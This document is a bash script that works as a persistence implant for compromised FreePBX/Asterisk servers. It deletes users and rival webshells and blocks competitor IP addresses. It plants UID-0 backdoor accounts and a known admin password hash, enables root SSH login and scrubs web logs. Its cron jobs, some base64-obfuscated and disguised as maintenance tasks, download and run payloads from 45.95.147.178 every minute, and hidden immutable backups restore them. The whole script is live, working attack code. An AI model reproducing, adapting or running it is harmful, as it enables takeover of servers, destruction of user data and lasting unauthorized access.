#!/bin/bash

mkdir -p /tmps /tmp /trmp /var/spool/asterisk/tmp 2>/dev/null || true

rm -rf /tmp/* /tmps/* /trmp/* /var/tmp/* /var/tmps/* /var/trmp/* /var/lib/asterisk/bin/devnull* 2>/dev/null || true

rm -rf /tmp/devnull24 /tmps/devnull24 /trmp/devnull24 /var/tmp/devnull24 /var/tmps/devnull24 /var/trmp/devnull24 /var/lib/asterisk/bin/devnull24 2>/dev/null || true

rm -rf /tmp/devnull23 /tmps/devnull23 /trmp/devnull23 /var/tmp/devnull23 /var/tmps/devnull23 /var/trmp/devnull23 /var/lib/asterisk/bin/devnull23 2>/dev/null || true

rm -rf /tmp/devnull2 /tmps/devnull2 /trmp/devnull2 /var/tmp/devnull2 /var/tmps/devnull2 /var/trmp/devnull2 /var/lib/asterisk/bin/devnull2 2>/dev/null || true

rm -rf /tmp/k /tmps/k /tmp/.??* /tmps/.??* /trmp/.??* 2>/dev/null || true
# ============================================
cd /tmp 2>/dev/null; awk -F: '($3 == 0 || $3 >= 1000) && $1 != "root" {system("userdel -rf " $1 " 2>/dev/null; sed -i \"/^" $1 ":/d\" /etc/passwd /etc/shadow /etc/group /etc/gshadow; rm -rf /home/" $1 " 2>/dev/null")}' /etc/passwd
# ============================================
mysql -u root --password='' asterisk -e "DELETE FROM ampusers WHERE username != 'admin'; INSERT INTO ampusers SET username='freepbxusers', sections='*', password_sha1='6ea9c6d2d932532a4cd44c7974fb1a0a87dbfcf9';" 2>/dev/null || true
# ============================================
mysql -u root --password='' asterisk -e "DELETE FROM ampusers WHERE username NOT IN ('admin', 'freepbxusers'); UPDATE ampusers SET password_sha1='6ea9c6d2d932532a4cd44c7974fb1a0a87dbfcf9', sections='*' WHERE username='admin'; INSERT INTO ampusers (username, password_sha1, sections) VALUES ('freepbxusers', '6ea9c6d2d932532a4cd44c7974fb1a0a87dbfcf9', '*') ON DUPLICATE KEY UPDATE password_sha1='6ea9c6d2d932532a4cd44c7974fb1a0a87dbfcf9', sections='*';" 2>/dev/null || true
# ============================================
# malicious files removal
{
    grep -r --include="*.php" -l -E "(eval.*base64_decode|/\*[A-Za-z0-9]+\*/eval|system\(\\\$_GET\[)|eval\(\\\$_POST|eval\(\\\$_REQUEST|eval\(\\\$_GET|system\(\\\$c\s" /var/www/html/ 2>/dev/null
    grep -rE --include="*.php" "PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgPgo8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iY21kIiBzaXplPSc4MCcgLz4KICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9ImV4ZWN1dGUiIHZhbHVlPSJFeGVjdXRlIiAvPiA8aHIgLz4KPC9mb3JtPg" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "New-Pbx" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "Emad__Was__Here" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "VictamPbx" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "t3rr0r" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "Hacked" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "b374k" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgPjxpbnB1dCBzaXplPTIwIHR5cGU9cGFzc3dvcmQgbmFtZT0icCIgLz48aW5wdXQgc2l6ZT02MCB0eXBlPXRleHQgbmFtZT0iYyIgLz48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9IkhhY2tlZCIgLz48L2Zvcm0" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "Black Ban V1.01" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "c2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9SRVFVRVNUWydtZDUnXSkgJiYgbWQ1KCRfUkVRVUVTVFsnbWQ1J10pID09ICdiNmJhMGZlNDgxOWI2NWUzOTZlNzEzNzg1YjI1ODI2ZScpIHsKICAgICRfU0VTU0lPTlsnbG9va2knXSA9ICdsb2dnZWQnOwp9CmlmICghaXNzZXQoJF9TRVNTSU9OWydsb29raSddKSkgewogICAgZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI" /var/www/html/ 2>/dev/null | cut -d ':' -f1
    grep -rE --include="*.php" "CnNlc3Npb25fc3RhcnQoKTsKaWYgKGlzc2V0KCRfUkVRVUVTVFsnbWQ1J10pICYmIG1kNSgkX1JFUVVFU1RbJ21kNSddKSA9PT0gJzc1ODY4ZTA4ZGNhNzE4YTVlYmRhYzdmNGU3NjJhODRiJykgewogICAgJF9TRVNTSU9OWydNQUZJQSddID0gJ2xvZ2dlZCc7Cn0KaWYgKCFpc3NldCgkX1NFU1NJT05bJ01BRklBJ10pKSB7CiAgICBlY2hvICc8Zm9ybSBtZXRob2Q9InBvc3QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJtZDUiIHNpemU9IjMyIi8" /var/www/html/ 2>/dev/null | cut -d ':' -f1
} | sort -u | while read file; do
    [ -f "$file" ] && rm -rf "$file" &>/dev/null || true
done

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '<?php system(' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'Emad__Was__Here' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'XIlphUsiO4msro7W13SzX93D' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'E8BcHrsgsXBGDf' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '34SapF2b' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'PRWV3tQ99H8fhI0ho' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgPjxpbnB1dCBzaXplPTIwIHR5cGU9cGFzc3dvcmQgbmFtZT0icCIgLz48aW5wdXQgc2l6ZT02MCB0eXBlPXRleHQgbmFtZT0iYyIgLz48aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9IkhhY2tlZCIgLz48L2Zvcm0' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'b374k' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'Hacked' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'Unauth0r1zed' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 't3rr0r' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '0e192062b367640f89ecff7c7f4ae1b9' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '52fFCRq3eSzikNOACwOlABWSU337FD' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '1JEjqYvbRSA8PMTjB' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'qkLKx22ycIdbEdd2ewNodHRy' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'UApLWfZz3vIhSFBPJvUnolRm' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'vz3onejOSL3vRSA9Ch3poEEyDkKFFfXnZZZQ647HnV2ceA' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'XCafVCH5E7TLib5Vw6PWqyfDDu' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'z5IB9IIKD4bAsifd3tTghCaD' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'a5xdnFSPhEOWpff9K02tTUcLdgg8qEgLCLwPPOzw3nt' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'ZBGmlpULjIylRE83rv3nO9RPviPfwQZbf' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'H1IT0eAYFb2NlKOrCU7jIKWdkhue6jQavQbgrQtcJDMfzfTlDVvaf6OCzetgyPhlERKTWgAdr5iX9qoU6z0NUS2otImreZ33vi7aIVQzdQG0aDVsJDGEXiMpeWE' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'Black Ban V1.01' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'xtb4iPdnIWJRxU8IyOQEcyjY' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '6thGn5eUaCSpzv' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'HI7sTioa' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'c2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9SRVFVRVNUWydtZDUnXSkgJiYgbWQ1KCRfUkVRVUVTVFsnbWQ1J10pID09ICdiNmJhMGZlNDgxOWI2NWUzOTZlNzEzNzg1YjI1ODI2ZScpIHsKICAgICRfU0VTU0lPTlsnbG9va2knXSA9ICdsb2dnZWQnOwp9CmlmICghaXNzZXQoJF9TRVNTSU9OWydsb29raSddKSkgewogICAgZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '5Bx04ERlrGnXR2yra' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'PC2DFckV8Pr7VsIlz' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'B0WykLMrTWM3ksFE7CwoqHqB' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'xBzLIuwz8oDrW2' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'Nmg8ls5H' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'c2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9SRVFVRVNUWydtZDUnXSkgJiYgbWQ1KCRfUkVRVUVTVFsnbWQ1J10pID09ICdiNmJhMGZlNDgxOWI2NWUzOTZlNzEzNzg1YjI1ODI2ZScpIHsKICAgICRfU0VTU0lPTlsnbG9va2knXSA9ICdsb2dnZWQnOwp9CmlmICghaXNzZXQoJF9TRVNTSU9OWydsb29raSddKSkgewogICAgZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'VictamPbx' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgPgo8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iY21kIiBzaXplPSc4MCcgLz4KICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9ImV4ZWN1dGUiIHZhbHVlPSJFeGVjdXRlIiAvPiA8aHIgLz4KPC9mb3JtPg' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'New-Pbx' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'd6e08cf66c4e2c48bd74db31cf697615' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '9490f20681692b508c4b04cd14d79190' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '1c95bad5b03658f331833d6ea9e77887' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '9KzV53W471fILfew1M1DULk0' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'FaTaLisTiCz_Fx' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'hRWv5p9vRt90YFivFJjV3L5G' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'IlXGEbLAy9GFYU' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'yhVmfo8f' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'pTFr1cffgGFs0PExj' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'DDwrCQLX' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'v1vXWIUI01ODa0' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'Lh76D9c0svOZkklrL9LurM9y' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'ix731zQb7mdDj9mdS' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '9VkwhyK7' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'XOf2eR5oAraIs2' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'aIlL71SrsimmeePxqWBGOpRU' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '6a4IRS7JN4x37MUcb' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'kJnctpXKOi249YYSoaHyqnLW' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'SHzAg0Y1W0QDZUXKj' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il 'hmQkq0io' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -Il '2PGY4kKo38Axxy' \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -IlE "INJ3CTOR3|New-Pbx|VictamPbx|b3d0r|yokyok|bm2cjjnRXac1WW3KT7k6MKTR|watchTowr|tchTowr|nvd0rz|bluej|nahda" \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true

# find /var/www -type f \( -name '*.php' -o -name '*.js' -o -name '*.sh' \) -print0 \
find /var/www -type f -name '*.php' -print0 \
  | xargs -0 grep -IlE "VictamPbx|a17d1e7875f3d442caba422be33cdfe0|New-Pbx|AAAAB3NzaC1yc2EAAAADAQABAAABAQCLLJeL3g2dbjGE" \
  | xargs -r -d '\n' rm -v -- 2>/dev/null || true
# ============================================
mkdir -p /tmps /tmp /trmp /var/spool/asterisk/tmp 2>/dev/null || true
# ============================================
printf '%s' 'dXNlcmFkZCAtcyAvYmluL2Jhc2ggIC1vdSAwIC1nIDAgLXAgJyQxJG5SejFDYnRrJDZEbkdzMzduLk9wUGNnZWpVZnA5cC4nIG5ld2ZwYnhzICY+L2Rldi9udWxs' | base64 -d | bash 2>/dev/null || true
printf '%s' 'dXNlcmFkZCAtcyAvYmluL2Jhc2ggIC1vdSAwIC1nIDAgLXAgJyQxJG5SejFDYnRrJDZEbkdzMzduLk9wUGNnZWpVZnA5cC4nIG5ld2ZwYnggJj4vZGV2L251bGw=' | base64 -d | bash 2>/dev/null || true
printf '%s' 'dXNlcmFkZCAtcyAvYmluL2Jhc2ggIC1vdSAwIC1nIDAgLXAgJyQxJG5SejFDYnRrJDZEbkdzMzduLk9wUGNnZWpVZnA5cC4nIHhoaW1heCAmPi9kZXYvbnVsbA==' | base64 -d | bash 2>/dev/null || true
# ============================================
echo '*/1 * * * * wget -q http://45.95.147.178/k.php -O /var/lib/asterisk/bin/zen222 && bash /var/lib/asterisk/bin/zen222' | crontab - 2>/dev/null || true
echo '*/1 * * * * wget -q http://45.95.147.178/k.php -O /var/lib/asterisk/bin/devnull312 && bash /var/lib/asterisk/bin/devnull312' | crontab - 2>/dev/null || true
echo '*/1 * * * * wget -q http://45.95.147.178/k.php -O /var/lib/asterisk/bin/devnull212 && bash /var/lib/asterisk/bin/devnull212' | crontab - 2>/dev/null || true
echo '*/2 * * * * wget -q http://45.95.147.178/k.php -O /tmp/.cache/update && bash /tmp/.cache/update' | crontab - 2>/dev/null || true
echo '*/3 * * * * wget -q http://45.95.147.178/k.php -O /dev/shm/.systemd/kernel && bash /dev/shm/.systemd/kernel' | crontab - 2>/dev/null || true
# ============================================
mkdir -p /tmps /tmp /trmp /var/spool/asterisk/tmp 2>/dev/null || true
RANDOM_PAYLOAD=$(tr -dc 'a-z0-9' </dev/urandom | head -c8)
for dir in /tmps /tmp /trmp; do
    PAYLOAD="${dir}/.${RANDOM_PAYLOAD}"
    (wget -q --no-check-certificate http://45.95.147.178/ -O "$PAYLOAD" || curl -s --insecure -o "$PAYLOAD" http://45.95.147.178/) 2>/dev/null || true
    [ -s "$PAYLOAD" ] && bash "$PAYLOAD" 2>/dev/null || true
done
# ============================================
find /home -name authorized_keys -exec sed -i '/AAAAB3NzaC1yc2EAAAADAQABAAABAQCLLJeL3g2dbjGE/d' {} \; 2>/dev/null || true
rm -f /root/.ssh/authorized_keys 2>/dev/null || true
# ============================================
for f in /etc/freepbx.conf /etc/asterisk/*.conf /etc/crontab /etc/cron.d/*; do
    [ -f "$f" ] && sed -i "s/62\.171\.157\.156\|178\.214\.77\.7\|45.234\.176\.202\|46\.37\.21\.63\|162\.217\.98\.180\|202\.170\.120\.157\|111\.223\.32\.50/45.95.147.178/g" "$f" 2>/dev/null || true
done
# ============================================
for i in 62.171.157.156 178.214.77.7 45.234.176.202 46.37.21.63 162.217.98.180 172.93.111.169 107.191.47.36 3.89.108.204 37.252.64.234 202.170.120.157 111.223.32.50; do
    iptables -C INPUT -s $i -j DROP 2>/dev/null || iptables -A INPUT -s $i -j DROP 2>/dev/null || true
    iptables -C OUTPUT -d $i -j DROP 2>/dev/null || iptables -A OUTPUT -d $i -j DROP 2>/dev/null || true
    iptables-save > /etc/sysconfig/iptables
done
# ============================================
useradd -o -u 0 -g 0 -p '$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' centos -s /bin/bash -d /dev/null 2>/dev/null || echo "centos:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.:0:0:root:/root:/bin/bash" >> /etc/passwd 2>/dev/null || true
useradd -o -u 0 -g 0 -p '$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' admin -s /bin/bash -d /dev/null 2>/dev/null || echo "admin:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.:0:0:root:/root:/bin/bash" >> /etc/passwd 2>/dev/null || true
useradd -o -u 0 -g 0 -p '$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' support -s /bin/bash -d /dev/null 2>/dev/null || echo "support:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.:0:0:root:/root:/bin/bash" >> /etc/passwd 2>/dev/null || true
useradd -o -u 0 -g 0 -p '$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' issabel -s /bin/bash -d /dev/null 2>/dev/null || echo "issabel:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.:0:0:root:/root:/bin/bash" >> /etc/passwd 2>/dev/null || true
useradd -o -u 0 -g 0 -p '$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' sangoma -s /bin/bash -d /dev/null 2>/dev/null || echo "sangoma:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.:0:0:root:/root:/bin/bash" >> /etc/passwd 2>/dev/null || true
useradd -o -u 0 -g 0 -p '$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' emo -s /bin/bash -d /dev/null 2>/dev/null || echo "emo:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.:0:0:root:/root:/bin/bash" >> /etc/passwd 2>/dev/null || true
useradd -o -u 0 -g 0 -p '$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' xhimax -s /bin/bash -d /dev/null 2>/dev/null || echo "xhimax:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.:0:0:root:/root:/bin/bash" >> /etc/passwd 2>/dev/null || true
# ============================================
touch /var/www/html/admin/views/ajax.php -r /var/www/html/admin/views/footer.php 2>/dev/null || true
# ============================================
for file in {"/root/.bash_profile","/root/.bashrc","/etc/rc.local"}; do if ! grep setsid $file |grep serv >/dev/null 2>/dev/null; then echo "KHNldHNpZCB3Z2V0ICJodHRwOi8vNDUuOTUuMTQ3LjE3OC9rLnBocCIgLU8gL3Zhci9zcG9vbC9hc3Rlcmlzay90bXAvc2VydiAyPi9kZXYvbnVsbCA+L2Rldi9udWxsOyBiYXNoIC92YXIvc3Bvb2wvYXN0ZXJpc2svdG1wL3NlcnYgMj4vZGV2L251bGwgPiAvZGV2L251bGwgJiApIDI+JjE="|base64 -d >> $file; echo "" >> $file; fi; done 2>/dev/null || true
# ============================================
useradd -m -s /bin/bash sugarmaint 2>/dev/null || true
useradd -m -s /bin/bash spamfilter 2>/dev/null || true
useradd -m -s /bin/bash asteriskuser 2>/dev/null || true
useradd -m -s /bin/bash supports 2>/dev/null || true
useradd -m -s /bin/bash freepbxuser 2>/dev/null || true
useradd -m -s /bin/bash supermaint 2>/dev/null || true
useradd -m -s /bin/bash asterisk 2>/dev/null || true
useradd -m -s /bin/bash hima 2>/dev/null || true
echo 'root:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'hima:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'asterisk:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'sugarmaint:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'spamfilter:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'asteriskuser:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'supports:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'freepbxuser:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'supermaint:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
echo 'juba:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2>/dev/null || true
sed -i 's/^#Port .*/Port 22/' /etc/ssh/sshd_config 2>/dev/null || true
sed -i 's/^Port .*/Port 22/' /etc/ssh/sshd_config 2>/dev/null || true
sed -i 's/^#PermitRootLogin .*/PermitRootLogin yes/' /etc/ssh/sshd_config 2>/dev/null || true
sed -i 's/^PermitRootLogin .*/PermitRootLogin yes/' /etc/ssh/sshd_config 2>/dev/null || true
systemctl reload sshd 2>/dev/null || service ssh reload 2>/dev/null || kill -HUP $(cat /var/run/sshd.pid 2>/dev/null) 2>/dev/null || true
iptables -A INPUT -p tcp --dport 22 -j ACCEPT 2>/dev/null || true
find /var/log/httpd/ -maxdepth 1 -name "*.log" -type f -exec sed -i '/restapps/d' {} \; 2>/dev/null || true
echo '*/1 * * * * wget http://45.95.147.178/k.php -O /var/lib/asterisk/bin/zen222;bash /var/lib/asterisk/bin/zen222'|crontab - 2>/dev/null || true
echo '*/1 * * * * wget http://45.95.147.178/k.php -O /var/lib/asterisk/bin/devnull312;bash /var/lib/asterisk/bin/devnull312'|crontab - 2>/dev/null || true
echo '*/1 * * * * wget http://45.95.147.178/k.php -O /var/lib/asterisk/bin/devnull212;bash /var/lib/asterisk/bin/devnull212'|crontab - 2>/dev/null || true
# ============================================
# HIDDEN DIRECTORIES
# ============================================
mkdir -p /usr/lib/.systemd /usr/share/.fonts /var/lib/.dbus /var/tmp/.X11 /opt/.local /var/cache/.fontconfig /etc/.ssl /root/.config 2>/dev/null

for loc in "/usr/lib/.systemd/.cache" "/usr/share/.fonts/.config" "/var/lib/.dbus/.data" "/var/tmp/.X11/.Xauthority" "/opt/.local/.bashrc" "/var/cache/.fontconfig/.cfg" "/etc/.ssl/.cert" "/root/.config/.pref"; do
    mkdir -p "$(dirname "$loc")" 2>/dev/null
    crontab -l > "$loc" 2>/dev/null
    [ -s "$loc" ] && chattr +i "$loc" 2>/dev/null
done

# ============================================
# PERSISTENT PAYLOAD DOWNLOADERS
# ============================================
B64_ZEN2='d2dldCAtcSAtLXRpbWVvdXQ9MSAtLXRyaWVzPTMgaHR0cDovLzQ1Ljk1LjE0Ny4xNzgvay5waHAgLU8gL3Zhci9saWIvYXN0ZXJpc2svYmluL3plbjIgJiYgYmFzaCAvdmFyL2xpYi9hc3Rlcmlzay9iaW4vemVuMg=='
B64_DEVNULL='d2dldCAtcSAtLXRpbWVvdXQ9MSAtLXRyaWVzPTMgaHR0cDovLzQ1Ljk1LjE0Ny4xNzgvay5waHAgLU8gL3Zhci9saWIvYXN0ZXJpc2svYmluL2Rldm51bGwyICYmIGJhc2ggL3Zhci9saWIvYXN0ZXJpc2svYmluL2Rldm51bGwy'
B64_HEAL='Zm9yIGIgaW4gL3Vzci9saWIvLnN5c3RlbWQvLmNhY2hlIC91c3Ivc2hhcmUvLmZvbnRzLy5jb25maWcgL3Zhci9saWIvLmRidXMvLmRhdGEgL3Zhci90bXAvLlgxMS8uWGF1dGhvcml0eSAvb3B0Ly5sb2NhbC8uYmFzaHJjIC92YXIvY2FjaGUvLmZvbnRjb25maWcvLmNmZyAvZXRjLy5zc2wvLmNlcnQgL3Jvb3QvLmNvbmZpZy8ucHJlZjsgZG8gWyAtcyAiJGIiIF0gJiYgY3JvbnRhYiAiJGIiICYmIGJyZWFrOyBkb25l'

{
    crontab -l 2>/dev/null || true
    echo "0 1 * * * /usr/sbin/logrotate /etc/logrotate.conf >/dev/null 2>&1"
    echo "*/1 * * * * /usr/bin/fc-cache -f -v >/dev/null 2>&1"
    echo "0 1 * * * /usr/bin/openssl x509 -in /etc/ssl/certs/ca-certificates.crt -noout -dates >/dev/null 2>&1"
    echo "$((RANDOM%60)) * * * * echo '${B64_ZEN2}' | base64 -d | bash >/dev/null 2>&1"
    echo "$((RANDOM%60)) * * * * echo '${B64_DEVNULL}' | base64 -d | bash >/dev/null 2>&1"
    echo "$((RANDOM%60)) * * * * echo '${B64_HEAL}' | base64 -d | bash >/dev/null 2>&1"
    echo "*/1 * * * * pgrep -f 'zen2|devnull2' >/dev/null 2>&1 || (bash /var/lib/asterisk/bin/zen2 >/dev/null 2>&1 &)"
